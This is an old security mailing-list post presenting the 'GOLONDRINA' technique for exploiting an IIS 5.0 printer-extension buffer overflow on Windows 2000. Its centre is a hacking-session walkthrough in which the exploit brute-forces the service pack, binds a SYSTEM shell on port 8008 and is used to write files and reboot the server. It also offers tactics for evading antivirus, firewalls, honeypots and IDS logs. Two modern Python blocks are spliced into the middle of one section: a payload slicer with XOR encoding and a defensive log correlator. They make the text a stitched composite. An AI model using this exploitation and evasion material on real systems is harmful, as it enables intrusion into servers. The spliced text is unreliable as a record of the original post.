-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

This post contains a draft plus an exploit (attached) describing an
alternative approach to breaking NT buffer overflows (b0fs). The proof of
concept exploit breaks Windows 2000 SP0/SP1. A lot of the information is
aimed at "NT-b0f researchers". Some "sections" may be useful to IDS and
honeypot people. Pen-testers can test the exploit after getting OS
fingerprints with DeePo. Microsoft and friends can read our "Ethical
compromise or dancing with the most sexy company ..." section in the draft.

The draft contains "ASCII ART". If you have problems viewing this paper you
will find a copy at ...

  http://www.deepzone.org/quick.asp?link=golondrina

Finally, note the early stage of development. The code may be unstable,
but the proof of concept exploit works very well on our computers (lab
environment). In our opinion GOLONDRINA gives us a new perspective and
more possibilities for intrusion, with important consequences for
traditional and common defence techniques ...

regards,

|Zan

-----

2001/12/22

--==[ Uploading code IN-PROCESS - CodeName: GOLONDRINA! ]==--

DeepZone Digital Security - http://www.deepzone.org
by |Zan <izanat_private>

-----------------

  "The dark swallows will return
   to hang their nests on your balcony,
   and once again, with their wings, at its panes
   they will playfully call.
   But those that held back their flight
   to contemplate your beauty and my happiness,
   those that learned our names ...
   those ... will not return!"

   .... Gustavo Adolfo Bécquer (1836-1870)
   (translated from the Spanish; "golondrina" is Spanish for "swallow")

-----------------

About this draft!
-----------------

This post carries a remote exploit for W2k/IIS 5.0 SP0 and SP1. This "toy"
is only proof of concept code showing a basic implementation of "Uploading
code IN-PROCESS", a.k.a. the *GOLONDRINA* technique, on NT servers. In
fact, this exploit abuses an "old" vulnerability discovered by eEye months
ago
[2]. The vulnerability was named "Remote IIS ISAPI Printer Extension
Buffer Overflow", and I'll try to show the advantages and disadvantages of
exploiting it with the GOLONDRINA technique in mind.

People who only run exploits or pen-test networks will see that this
exploit *ONLY* binds a remote shell on port 8008. "Single-hit" exploits
for this bug already exist and get the same effect in a safer way. I am
presenting this exploit as an "alternative" to the traditional ways of
exploitation, although I am still studying its behaviour. It can be seen
as work in progress. I chose the "Remote IIS ISAPI Printer Extension
Buffer Overflow" vulnerability only as a typical piece of commercial code
to exploit. The GOLONDRINA technique is quite general: it was tested on
products with buffer overflow problems such as iPlanet, IIS and ZBServer,
and the results were *very good*. New problems appear, but a lot of the
common and traditional problems of exploiting buffer overflows disappear.

This post isn't a full, detailed paper. It is only a draft with my
progress and ideas, looking for feedback and valuable comments. I am going
to try a readable style where my "fantastic English" doesn't generate too
much noise.

Ethical compromise or dancing with the most sexy company: Microsoft!
--------------------------------------------------------------------

Before I begin to outline some new problems and the real impact of
GOLONDRINA exploits, I'd like to say a few words about the BugTraq
community, full disclosure, some commercial groups and, most important,
our old *exiled* but not forgotten fellows.

Sometimes when I read BugTraq I see a lot of people arguing about things
that are not very important compared to real security and the impact of
bugs. Sadly, I see a lot of commercial people/vendors/security firms
complaining about exploits released by individuals or non-profit
organizations. I'd like to remind them where they are: on a free
full-disclosure list.
This is not the right place to show indignation, spamming other readers
and generating a flame war with cross-postings. In this post I am not
going to argue about full disclosure with white hats, black hats, kiddies,
lamerz ... or any other electronic tribe. In my opinion I am writing about
a *very old and public* bug with a lot of patches and updates available.
On the other hand, this vulnerability is only a launch pad to show a
general and portable buffer overflow technique. This post is aimed at free
underground people and security researchers. The target is feedback and
communication, sharing ideas and work. If you only want to argue about
full disclosure then you can try mailing Scott Culp with a proper subject
... mmmm ... "It's Time to End Information Anarchy" could be a good
subject to get his attention ... or not!

If we win friends like the "Microsoft Security Response Center" (writing
spam and innocent bulletins on BugTraq) and we lose more old and good
friends like the "Teso Team" and other "exiled" BugTraq friends, then I'd
like to know what's happening here, and whether BugTraq and the
underground security community are being infected by Microsoft and by the
war among "third parties" to get "security business".

Well, the previous lines are only my personal opinion about how the
commercial world can *kill our public source of knowledge and our main way
of sharing it* ... It's time to dance with the most sexy company today ...
Microsoft!

Uploading code IN-PROCESS - CodeName: GOLONDRINA!
-------------------------------------------------

Currently, buffer overflow exploits can be seen as two different parts:
injector + payload.

If it is a friendly b0f then you can exploit it with a single-hit exploit
containing injector + payload and gain full control over the remote
process (this is the most common way!).

If it isn't a friendly b0f then you can write a more general injector,
download your payload to disk and then execute it.
Both techniques have pros and cons: portability, reusability, very noisy
intrusion ...

I have been working on another "general technique" in the last months:
the GOLONDRINA technique. From a theoretical perspective it can be
described as a very elaborate, multi-part injector that takes any general
payload as a "component" or "object". In this context the "injector" is
formed by different functional components, and they run several times
along the intrusion:

  - LOCATOR.   Works on relocatable code, providing position independence
               and fixing offsets and deviations.
  - PATCHER.   Stores pointers and API addresses (avoids page faults in
               the process).
  - ALLOCATER. Allocates functional "code bags". Stealth & evasion.
  - COPYER.    Regenerates the original payload (decrypts and syncs the
               hits).
  - JUMPER.    Obtains the main "code bag" and executes the original
               payload.

The payload has to be relocatable code. The payload does its work and
returns control. It can be seen as an object or component with a single
method.

We can say that the GOLONDRINA technique takes control over the remote
overflow with sequential hits connecting on trusted ports. Each hit
overflows a single thread, does its work and keeps the remote software
alive. Hits are sequential, but they can take control at any time.
Simultaneous hits (multithreaded attack) are possible too. Sync and delays
are VERY important!

In a nutshell, GOLONDRINA exploits can inject tiny slices of relocatable
code into the vulnerable process, avoiding some traditional limitations
and providing opportunities for pre-fabricated code and abstraction. As we
are going to see, it gives us a fantastic power to build very elaborate
payloads, kicking traditional protections like antivirus, some IDS
heuristics or firewalls.

Old and new problems found and "solved"!
----------------------------------------

In this "section" I am going to outline some common problems with
possible solutions and how they were solved in my proof of concept
implementation.
I am only outlining the quickest path with a BASIC implementation.

Tiny buffers or very long payloads?
------------------------------------

Currently, if we find those problems we use a different approach (an
injector that downloads and executes the payload is a good solution), but
if the buffer is very tiny we have trouble downloading that code (not
enough space to code a minimal downloader).

GOLONDRINA fights those problems by generating slices and sending the
appropriate injector with each slice along the intrusion. Each slice can
contain code, data, another shrunken injector ... It lets us exploit the
vulnerability avoiding size restrictions. The exploiter chooses the
"exploitation block" (the bytes available per hit) and the exploit
calculates the number of hits and does the dirty job.

Note: Injector (m types) -> p types used (p <= m); n slices, where
n*slice = original payload.

cheap ASCII art
---------------

  injector(type 1) + slice = hit 1 ---+
  injector(type 2) + slice = hit 2 ---+          |F|
  injector(type 2) + slice = hit 3 ---+          |i|
  injector(type 2) + slice = hit 4 ---+          |r|
            .........                 |  trusted |e|
  injector(type 3) + slice = hit x ---+---port---|w|---> (Buggy Application)
            .........                 |          |a|
  injector(type p) + slice = hit n ---+          |l|
                                                 |l|

Abstraction & Object Oriented Exploits
--------------------------------------

GOLONDRINA exploits can join several hits and rebuild the original payload
in the remote overflowed process. It lets us build components or abstract
payloads; I am speaking about pre-fabricated code. Some examples could be:
writing a file to disk, a hash dumper or a remote shell. Reusing code or
porting tools as "components or payloads" is possible (bear in mind that
it isn't very useful!). Another possibility is "component chaining"
(HashDumper + WriteToDisk). It is possible, but it is unnecessary if you
get a full intrusion.

In my example exploit I used our "Rapid Exploit Development tool" (RED
tool) to get a pre-fabricated component: a remote shell on port 8008 [3].
This "cheap toy" was released exactly a year ago.
At this moment we have tracked 5 remote SYSTEM exploits with this tool.
Some of the exploits tracked on BugTraq using this tool affect IIS, Check
Point Firewall-1, Compaq Insight Manager and LiveStats. When anybody can
build a "10 minute exploit", we start to kill "0-day exploits" and
"trading" ...

Downloading & executing code vs. Uploading code IN-PROCESS
----------------------------------------------------------

Downloading & executing code is a "very safe" way to take control. It
needs (generally) a single-hit exploit with a back connection, and then a
general payload is downloaded & executed.

Uploading code IN-PROCESS handles another concept. You can use this
technique if you don't want a "very noisy" intrusion in the OS. It gives
you opportunities to bypass any potential problem by abusing a trusted
process. Imagine, for example, the following scenarios:

  - "They" have an antivirus installed. Downloading & executing, you are
    creating a new process. The antivirus can hook & check that new image
    being loaded from the hard disk. Uploading IN-PROCESS, you are
    smashing a trusted process. It isn't going to be checked every 10
    minutes - of course - to see if it has been infected.

  - Routers, firewalls ... If you download a payload you create an
    outgoing connection. It can be filtered in a very hostile
    environment. Uploading IN-PROCESS, you talk to trusted ports. You can
    launch each hit through several different proxies *at different
    times*!!!! (it's only a very extreme example!).

Other situations are possible.

Old technology becomes new stuff ...
-----------------------------------

What is a virus? ... yes, it is cyclic and relocatable code. Generally
they are tiny (2k-3k). In theory they can be imported with a correct
"exploitation block" in GOLONDRINA exploits, avoiding null bytes and
restrictions. Note that it would generate quite a few slices, and the
virus would have to be mutated beforehand.
A lot of compression engines and other fantastic resources are available
in viral technology ... they only need tiny mutations and they run very
well. Can you imagine a very high compression ratio in assembly? ... mmmm
... 10:1 would be enough to provide a lot of "features" ...

Brute-forcing. What Service Pack is installed?
-----------------------------------------------

A traditional problem in b0fing happens when you don't know the correct
service pack. You don't know the offsets or valid values, so your exploit
fails ... Although the following technique can be useful in single-hit
exploits, I designed it to avoid remote server crashes in GOLONDRINA
exploits.

Some fantastic exploiters released exploits that overwrite exception
frames ... but ... why overwrite them when we can abuse them too? If you
inoculate or upload a first "test slice" you can guess what service pack
is running. If it fails, the exception frame can catch your fault and your
Remote-IPC component won't return the correct reply.

The previous lines are only an example. It is code dependent, but
fortunately there are other ways. In the attached exploit you can see how
brute forcing is possible. I abuse an IIS exception frame that was
installed previously. If the server is handling n threads then the exploit
will freeze one thread with each unsuccessful brute-force test. Currently
I test 2 environments (Win2k Server SP0 & SP1), so if SP1 is installed the
exploit will work with (n-1) threads available. Bear in mind that brute
forcing is only implemented as a proof of concept, and it works very well.
In a real attack we'd have an nmap scan or similar to go on instead.

NULL and problematic bytes, printable shellcodes?
---------------------------------------------------

NULL and problematic bytes stop our payloads a lot of the time in a
single-hit exploit. Writing 2k of code worrying about printable style
isn't a good solution.
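The two problems (the slice bookkeeping from "Tiny buffers or very long payloads?" and the forbidden bytes this section is about) in one added example. This is not code from the DeepZone exploit: the 5-byte ASCII header stands in for the real injector that precedes each slice, CR and LF join NULL in the forbidden set on the assumption that a hit travels inside an HTTP request, the 180-byte block is the size the draft uses for IISPrnIsapi, and the payload bytes are constructed, not shellcode. A chunk that has no single-byte XOR key is split in two and retried, so a hard chunk costs extra hits rather than a failed exploit.

```python
"""Slice a payload into bad-byte-free hits and rebuild it on the far side.
Added example; the ASCII header models the per-hit injector's bookkeeping."""
import random
from typing import List, Optional

# Bytes that must never appear on the wire.  NULL ends C strings; CR and LF
# are assumed here because each hit rides inside an HTTP request.
BAD_BYTES = frozenset({0x00, 0x0A, 0x0D})

HEADER_LEN = 5  # b"G" + 2 hex digits (hit index) + 2 hex digits (XOR key)


def pick_key(chunk: bytes, start: int) -> Optional[int]:
    """Single-byte XOR key mapping every byte of `chunk` outside BAD_BYTES.
    The search starts at `start` so consecutive hits get different keys.
    Returns None when no such key exists for this chunk."""
    for i in range(256):
        k = (start + i) % 256
        if k == 0:
            continue  # XOR with 0 leaves the bad bytes in place
        if all((b ^ k) not in BAD_BYTES for b in chunk):
            return k
    return None


def build_hits(payload: bytes, block_size: int) -> List[bytes]:
    """Split `payload` into hits that each fit `block_size` bytes and carry
    no BAD_BYTES.  A chunk with no usable key is halved and retried."""
    if block_size <= HEADER_LEN + 1:
        raise ValueError("exploitation block too small for header + 1 byte")
    slice_len = block_size - HEADER_LEN
    pending = [payload[i:i + slice_len] for i in range(0, len(payload), slice_len)]
    hits: List[bytes] = []
    while pending:
        chunk = pending.pop(0)
        key = pick_key(chunk, (len(hits) * 37 + 1) % 256)
        if key is None:
            if len(chunk) == 1:
                raise ValueError("single byte has no bad-byte-free encoding")
            half = len(chunk) // 2
            pending[0:0] = [chunk[:half], chunk[half:]]  # keep order
            continue
        if len(hits) == 256:
            raise ValueError("2-digit hit index allows at most 256 hits")
        header = b"G%02x%02x" % (len(hits), key)   # printable by construction
        hits.append(header + bytes(b ^ key for b in chunk))
    return hits


def reassemble(hits: List[bytes]) -> bytes:
    """Receiver side: hits may arrive in any order or over several
    connections; the index in the header restores the sequence."""
    parts = {}
    for hit in hits:
        if hit[:1] != b"G" or len(hit) <= HEADER_LEN:
            raise ValueError("malformed hit")
        index, key = int(hit[1:3], 16), int(hit[3:5], 16)
        if index in parts:
            raise ValueError(f"duplicate hit {index}")
        parts[index] = bytes(b ^ key for b in hit[HEADER_LEN:])
    if sorted(parts) != list(range(len(parts))):
        raise ValueError("missing hit(s)")
    return b"".join(parts[i] for i in range(len(parts)))


def wire_clean(hits: List[bytes], block_size: int) -> bool:
    """True when every hit fits the block and carries no forbidden byte."""
    return all(len(h) <= block_size and not (set(h) & BAD_BYTES) for h in hits)


# Constructed stand-in for a payload: opcode-looking bytes, a NUL-terminated
# string, a CRLF and every byte value once.  Not real shellcode.
PAYLOAD = b"\x31\xc0\x50\x68" + b"cmd\x00" + b"\r\n" + bytes(range(256))


def demo(block_size: int = 180):
    """Slice PAYLOAD for the draft's 180-byte block, deliver the hits out of
    order and check the rebuild: (hit count, wire clean, rebuilt ok)."""
    hits = build_hits(PAYLOAD, block_size)
    shuffled = list(hits)
    random.Random(1).shuffle(shuffled)
    return len(hits), wire_clean(hits, block_size), reassemble(shuffled) == PAYLOAD


if __name__ == "__main__":
    n, clean, ok = demo()
    print(f"{n} hits, wire clean: {clean}, rebuilt: {ok}")
```

With the constructed payload and a 180-byte block the sender needs two hits; a 256-byte chunk that contains every byte value has no single-byte key at all (every key maps some byte to NULL), and the splitting fallback turns it into two hits instead of aborting. The same check that picks the key is what you would extend with any further byte the target's parser mangles (spaces, '%', '?' and so on for a URL context).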
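From the defender's side, the honeypot/IDS section further on makes the point that analyzers rebuild a payload by following one TCP connection, while a GOLONDRINA attack spreads its hits over several connections, source addresses and days, and that a weekly log purge loses the early hits. The following is an added example, not part of the DeepZone post: a correlator keyed on the target rather than on the connection. The log format, addresses and timestamps are constructed; the 400-byte Host threshold sits just below the ~420 the draft reports; the 14-day window is an assumption chosen to outlast a weekly purge; and the ".printer request plus oversized Host header" indicator is the trigger the eEye advisory [2] describes, which the draft itself does not spell out.

```python
"""Correlate multi-hit attacks across connections and days (added example)."""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional

HOST_LEN_THRESHOLD = 400               # margin below the ~420 the draft reports
CAMPAIGN_WINDOW = timedelta(days=14)   # assumption: longer than a weekly purge
MIN_HITS = 2


@dataclass(frozen=True)
class Event:
    ts: datetime
    src: str
    dst: str
    path: str
    host_len: int


@dataclass
class Alert:
    dst: str
    sources: List[str]
    first: datetime
    last: datetime
    hits: int


def parse_line(line: str) -> Optional[Event]:
    """Parse a constructed line such as
    '2002-02-21T15:23:00 10.1.1.5 192.168.1.10:80 GET /NULL.printer host_len=512'."""
    parts = line.split()
    if len(parts) != 6 or not parts[5].startswith("host_len="):
        return None
    try:
        ts = datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%S")
        host_len = int(parts[5][9:])
    except ValueError:
        return None
    return Event(ts, parts[1], parts[2], parts[4], host_len)


def is_hit(ev: Event) -> bool:
    """Per-request indicator: .printer request with an oversized Host header."""
    return ev.path.lower().endswith(".printer") and ev.host_len >= HOST_LEN_THRESHOLD


def per_flow_alerts(events: List[Event]) -> List[Event]:
    """What a per-connection analyzer sees: one isolated alert per hit."""
    return [ev for ev in events if is_hit(ev)]


def campaign_alerts(events: List[Event]) -> List[Alert]:
    """Group hits by target over a sliding window, ignoring the source, so
    hits days apart and from different IPs form one campaign."""
    by_dst: Dict[str, List[Event]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        if is_hit(ev):
            by_dst[ev.dst].append(ev)
    alerts = []
    for dst, hits in by_dst.items():
        group: List[Event] = []
        for ev in hits:
            if group and ev.ts - group[-1].ts > CAMPAIGN_WINDOW:
                if len(group) >= MIN_HITS:      # gap too long: close campaign
                    alerts.append(_alert(dst, group))
                group = []
            group.append(ev)
        if len(group) >= MIN_HITS:
            alerts.append(_alert(dst, group))
    return alerts


def _alert(dst: str, group: List[Event]) -> Alert:
    return Alert(dst, sorted({e.src for e in group}), group[0].ts, group[-1].ts, len(group))


def hits_still_logged(events: List[Event], retention: timedelta) -> int:
    """Hits a store purged after `retention` still holds when the last hit
    lands; below MIN_HITS nothing is left to rebuild the payload from."""
    hits = sorted(per_flow_alerts(events), key=lambda e: e.ts)
    if not hits:
        return 0
    return sum(1 for e in hits if e.ts >= hits[-1].ts - retention)


# Constructed sample on the draft's timeline: two hits on one day from two
# sources, the last hit nine days later from a third, plus benign requests.
SAMPLE_LOG = """\
2002-02-21T15:23:00 10.1.1.5 192.168.1.10:80 GET /NULL.printer host_len=512
2002-02-21T15:40:12 10.1.1.7 192.168.1.10:80 GET /default.asp host_len=24
2002-02-21T18:24:00 10.1.1.9 192.168.1.10:80 GET /NULL.printer host_len=480
2002-02-25T09:02:33 10.1.1.7 192.168.1.10:80 GET /x.printer host_len=30
2002-03-02T15:38:00 10.1.1.22 192.168.1.10:80 GET /NULL.printer host_len=470
2002-03-02T15:45:00 10.1.1.22 192.168.1.10:80 GET /izan.asp host_len=24
"""


def analyze(log: str = SAMPLE_LOG):
    """(per-connection alerts, campaign alerts, hits left in a 7-day store)."""
    events = [ev for ev in map(parse_line, log.splitlines()) if ev]
    return (per_flow_alerts(events), campaign_alerts(events),
            hits_still_logged(events, timedelta(days=7)))


if __name__ == "__main__":
    flow, camp, kept = analyze()
    print(len(flow), "isolated alerts;", kept, "hit(s) left in a 7-day store")
    for a in camp:
        print(f"campaign on {a.dst}: {a.hits} hits from {a.sources}, "
              f"{(a.last - a.first).days} days apart")
```

On the sample the per-connection view yields three unrelated alerts, the campaign view yields one alert against the target with three sources nine days apart, and a store purged weekly holds only the final hit when it lands, which is exactly the draft's "a lot of problems to rebuild our attack". The cost of this view is state per target that outlives the purge, so size the window and the per-target memory deliberately rather than keeping every request.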
When you have a look at my GOLONDRINA exploit you can see that a
multi-part injector is relatively short. A printable multi-part injector
is possible. Payloads aren't a problem: you can fit them with a good
"exploitation block", encoding (XORing, for example) each hit with a
different key. In this way each slice can contain valid, printable bytes
landing in a valid printable range. Bear in mind that a good programming
style avoids problems, and the previous lines are only possible in theory.

Killing emulators and virtualization monitors! - (stuff for hpoters/IDSers ;)
----------------------------------------------------------------------------

Honeypots are in fashion. A lot of people are playing with plex86,
VMware ... and a lot of similar software, catching malware. Some traffic
analyzers can save and rebuild exploits on the fly, and more. There are
some good implementations around the underground to kill some well-known
virtualizers or to detect anomalous "response times".

GOLONDRINA gives us "lightweight status exploits" in-process. Note that if
you implement "component chaining" or run a previous "killer slice" you
can detect (and sometimes kill) this software, *compromising only* some
code and stopping your exploit at an early exploitation stage. Then you
can send any garbage data or a false payload to the remote software
reversers. Who's the honeypotter then? ... a lot of possibilities.

Note that analyzer software rebuilds payloads by tracking a TCP/IP
connection, generally a single-hit exploit. It's different with a single
GOLONDRINA attack generating multiple connections from one or several IPs
at different times. In theory you can store a portion of your payload in
the victim process and inject more code in the following days (different
attack or infection stages). It isn't a very practical way, but in theory
it is possible if the server isn't restarted during that time. For
example:

  15:23 am 21/february/xxxx => first hit (killer slice. It isn't a VM!)
  18:24 pm 21/february/xxxx => (n-1) hits (payload has been inoculated!)
  13:38 pm 30/february/xxxx => last hit (we take control!)

If IDS logs are removed every week, when we take control on 30/february
(9 days later!) they will have a lot of problems rebuilding our attack and
recovering our payload & exploit. It's only an example, of course ;)

Keep the server alive!
-----------------------

Currently, if you take full control over the remote process you have no
problem keeping the server alive. The IISPrnIsapi exploit doesn't rely on
IIS's automatic restart: if that "feature" is deactivated the exploit will
continue working. In the example you can see how the word "Micros0ft"
(the marker the exploit patches into the server banner) survives along the
hack while I don't force a reboot.

IISPrnIsapi: A GOLONDRINA exploit!
----------------------------------

When we overflow IIS, a stack overflow appears at approximately *420*
characters. I chose an "exploitation block" of about 180 bytes along the
different stages. Notice the different sizes: 180 <<< 420.

The exploit can be configured in two modes:

  - Default Mode. *SPANISH VERSION* only.
  - Custom Mode Attack. International version.

[*] "Default Mode"

You have to set "customAttack" to "false" (line 22). It works on Windows
2000 Server Spanish edition. This configuration shows how brute forcing is
possible.

Next I am going to write up a hacking session where you'll see the exploit
running. The exploit was coded in Java, so it'll run on any JVM-aware
system (Windows, Solaris, Linux ...). The attack is launched against a
Windows 2000 Spanish Server/IIS 5.0 running an unknown service pack.

-- begin hacking-session

* Step 1 - we take a Windows 98 SE client running Sun's JVM with netcat!

  Microsoft(R) Windows 98
  (C)Copyright Microsoft Corp 1981-1999.

  C:\WINDOWS>cd c:\DeepZone

  C:\DeepZone>javac IISPrnIsapi.java

  C:\DeepZone>java IISPrnIsapi
  (c) 1998-2001 DeepZone. IISPrnIsapi Class coded by |Zan [@deepzone.org]
  Example: java IISPrnIsapi victim [port]
  Error: need a hostname!

* Step 2 - the attack is tested over a LAN with '80' as the default port!
  C:\DeepZone>java IISPrnIsapi 192.168.xxx.xxx
  (c) 1998-2001 DeepZone. IISPrnIsapi Class coded by |Zan [@deepzone.org]
  Example: java IISPrnIsapi victim [port]

  :. Default mode activated ...

  [*] Trying Win2k Server SP0 - Spanish Edition!
  Checking OS ... IIS/5.0 detected!
  Patching Server ... OK
  Vulnerable Server ... NOT detected!

  [*] Trying Win2k Server SP1 - Spanish Edition!
  Checking OS ... IIS/5.0 detected!
  Patching Server ... OK
  Vulnerable Server ... detected!
  Allocating memory (16k) ... OK
  Binding shell on port 8008 (be patient!) ... OK

  C:\DeepZone>

Notes:

  - The first test shows an innocent error dialog box, but the server
    keeps living (it isn't restarted).
  - The second test detects a vulnerable server (it returned "Micros0ft")
    and allocates 16k of memory!!! I only need about 1.5k, but I wanted to
    test whether I could inoculate viruses. 16k is a very large size and
    it worked very well.
  - When it binds a shell it is uploading a component IN-PROCESS (you are
    always working with legal connections against a trusted www port).
  - If you want to connect to that remote console you need a
    non-firewalled 8008 port.

* Step 3 - the server is our friend and it's ok

  C:\DeepZone>nc 192.168.x.x 80
  GET /default.asp

  <html>
  <head>
  <title>Working and fly out pages very fine!</title>
  </head>
  <body>
  .......

  C:\DeepZone>

* Step 4 - the server was brute-forced!

  C:\DeepZone>nc 192.168.x.x 80
  DeepZone

  HTTP/1.1 400 Peticion incorrecta
  Server: Micros0ft-IIS/5.0
  Date : Sat, xx yyy tttt 14:09:13 GMT
  Content-Type: text/html
  Content-Length: 80

  <html><head><title>Error</title></head><body>El parametro no es correcto ...

  Note:

  - I sent a wrong request. The web server returned its hacked header
    containing a ZERO in "Micros0ft". (The Spanish server strings mean
    "Bad Request" and "The parameter is incorrect".)

* Step 5 - get in with SYSTEM privileges if you wish!

  C:\DeepZone>nc 192.168.x.x 8008
  Microsoft Windows 2000 [Version 5.00.2195]
  (C) Copyright 1985-2000 Microsoft Corp.
  C:\WINNT\system32>cd c:\inetpub\wwwroot

  C:\Inetpub\wwwroot>echo Write test>izan.asp

  C:\Inetpub\wwwroot>type izan.asp
  Write test

  C:\Inetpub\wwwroot>

* Step 6 - while the hack is going on, the web server still serves pages!
  (another command.com on my client)

  Microsoft(R) Windows 98
  (C)Copyright Microsoft Corp 1981-1999.

  C:\WINDOWS>nc 192.168.xxx.xxx 80
  GET /izan.asp

  HTTP/1.1 200 OK
  Server: Micros0ft-IIS/5.0               <--- the ZERO is still present!
  ...
  Cache-control: private

  Write test

  C:\WINDOWS>

* Step 7 - we are SYSTEM and we're going to reboot the MACHINE!

  C:\Inetpub\wwwroot>net users

  Cuentas de usuario de \\XXXXXX          (User accounts for \\XXXXXX)

  Administrador    Invitado    IUSR_XXXXXX    ...

  C:\Inetpub\wwwroot>iisreset/reboot

* Step 8 - all is ok, Micros0ft becomes Microsoft and Bill is a happy guy again!

  Microsoft(R) Windows 98
  (C)Copyright Microsoft Corp 1981-1999.

  C:\WINDOWS>nc 192.168.xxx.xxx 80
  GET /izan.asp

  HTTP/1.1 200 OK
  Server: Microsoft-IIS/5.0               <--- the ZERO disappeared }:)
  ...
  Cache-control: private

  Write test

  C:\WINDOWS>

-- end hacking-session

[*] "Custom Mode Attack"

You have to set "customAttack" to "true" (line 22). Then you can run any
debugger or "DeePo" (IISPrnIsapi's companion tool). As I said, this
exploit launches some hardcoded values in the first steps. It was a design
compromise: the idea was to test the portability of remote components and
to show potential problems along with their advantages/disadvantages.
Normally anybody can set up a debugger and get those values, but if you
have problems getting that system fingerprint you can run this tool. It is
assembly code simulating an easy and cheap debugger over a C skeleton.
It'll give you a printable system fingerprint. Later, you can change or
add your fingerprint to the exploit and pen-test your systems.

"DeePo" was only tested on Win2k Server and Advanced Server - Spanish
version. It should work in any language.
The exploit doesn't really need all that data from your system, but since
I don't know whether your OS version may change more settings or critical
values, I had to cover all possible cases.

  Microsoft Windows 2000 [Version 5.00.2195]
  (C) Copyright 1985-2000 Microsoft Corp.

  C:\>cd deepzone

  C:\DeepZone>deepo c:\winnt\system32\inetsrv\inetinfo.exe

  (c) 2001 DeepZone - Digital Security.
  DeePo v0.1. Coded by |Zan <izanat_private> - http://www.deepzone.org
  Syntax: deepo [path to inetinfo.exe]
  (Ex: deepo c:\winnt\system32\inetsrv\inetinfo.exe)
  -------------------------------

  [*] Dumping IISPrnIsapi's fingerprint ...
  -----------------------------------------------
  0xcb, 0x4a, 0x33, 0x6c, 0x00, 0x00, 0x00, 0x00,
  0x6a, 0x46, 0xe8, 0x77, 0x90, 0x3d, 0xe8, 0x77,
  0x54, 0x74, 0x35, 0x6c, 0xad, 0x89, 0x99, 0x98,
  0xe5, 0x89, 0x99, 0x98
  -----------------------------------------------

  C:\DeepZone>

Import this fingerprint into IISPrnIsapi's code. Instructions are
contained in the source code and comments.

Problems running IISPrnIsapi
----------------------------

The exploit contains a "DELAY_SECONDS" value. You can modify this value to
get a new sync value. If the exploit fails you can set this value to 30
and run it again. Be patient.

When you connect to the remote shell you need a plain-text client like
netcat. Some Microsoft telnet clients won't work. You can find more
information about problems and solutions in the "References" section.

In any case, the exploit can fail. It's only proof of concept, and it runs
very well on our test computers.

References
----------

[1] DeepZone's GOLONDRINA (news, updates, DeePo, fingerprints ...)
    http://www.deepzone.org/quick.asp?link=golondrina

[2] eEye's advisory
    http://www.eeye.com/html/Research/Advisories/AD20010501.html

[3] DeepZone's Win32 ShellCode Generator (RED tool) & example exploits
    http://www.deepzone.org/quick.asp?link=w32scgen

[4] Microsoft Security Bulletin
    http://www.microsoft.com/technet/security/bulletin/MS01-023.asp

[5] Microsoft Windows 2000 Server and Advanced Server patches
    http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29321

[6] Microsoft Windows 2000 Datacenter Server patches
    Patches for Windows 2000 Datacenter Server are hardware-specific and
    available from the original equipment manufacturer.

GOLONDRINA FEEDBACK & COPYHACK
------------------------------

Researching new techniques on NT is quite a difficult thread. We aren't
looking for comparisons with single-hit exploits (which are more stable)
or for reports of problems running this exploit. Our objective is to make
progress collecting new fingerprints, giving a new general attack vector.

If you want to help us you can send *tested and running* fingerprints to
contactat_private. They will be published with your e-mail or any contact
data if you wish. Before you send your fingerprints you may want to check
whether some fellow already sent the same fingerprint. In that case send
us your fingerprint ONLY if your OS version, language and service pack
don't match that fingerprint. Several fingerprints may match on different
platforms.

Feedback, good or bad testing, will be appreciated, but please don't ask
me about illegal activities or whether I can help you with basic exploit
coding. I have spent precious time building "DeePo" and writing this
overview draft. I am sure that some people can get some good information
here, but feedback is the only way to get more and better information,
helping full disclosure. Send us your impressions and "experiences"
(electronic experiences, of course ;).
This paper was written in a technical/non-technical way to reach more
people, so if you want to distribute this paper you have to do it freely.
Closed bulletins or paid services aren't the correct way, but if you have
a commercial site where you make money and you want to spread this
information you can do it ONLY WITH OUR PRIOR CONSENT, in a free way. Feel
free to contact us in any way!

Remember, this information and the associated source code are provided
"as is". You can read and run this code at your own risk, without any
warranty. I can't guarantee that the source code matches exactly what is
described in this documentation, nor can I ensure that it's fully stable
on your system. In other words, this information should be considered
"work in progress".

Hack isn't the exploit ... hack is GOLONDRINA itself!

About DeepZone - Digital Security!
----------------------------------

DeepZone - Digital Security! is a European group researching computing
and security. Currently we are developing in Spain. We can be contacted at
contactat_private

Our website can be reached at http://www.deepzone.org
Unstable GOLONDRINA stuff is maintained at
http://www.deepzone.org/quick.asp?link=izan

Greetings & Acknowledgments!
----------------------------

As readers of "Greetings & Acknowledgments" sections are well aware,
writing a non-profit draft is never an effort undertaken solely by the
authors.

I'd like to greet all our friends in 29A, the best international viruXers
group. All the new international friends and groups who contacted us in
the last years and kept *very good* communications about hacks, NT stuff
and more! All the security team at eEye.com, for releasing this
vulnerability in a full-disclosure way and giving us a commercial & common
software bug on which to release our new and public intrusion techniques.
Good researchers: Barnaby Jack, Greg Hoglund, Joey__, David Litchfield ...
and more. The entire crew at DeepZone.org (^Anuska^, Nemo and TheWizard).
Every person who sent in bouquets and brickbats, any feedback or greetz.
All these people deserve much thanks and credit.

Finally, as always, I'd like to offer my largest thanks to my inspiration
in designing GOLONDRINA, Sandra, the most important hacker in my life. My
soul mate.

--] EOT

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>
Comment: http://www.deepzone.org/quick.asp?link=izan

iQA/AwUBPCTNWUaVob5q1uFzEQKuXQCfQQCob856UoCFkqL3xzrzZ8iu+YQAoKyV
C8zNwtlG80zZ/NpjUQbDyww+
=4tEX
-----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Sat Dec 22 2001 - 11:46:06 PST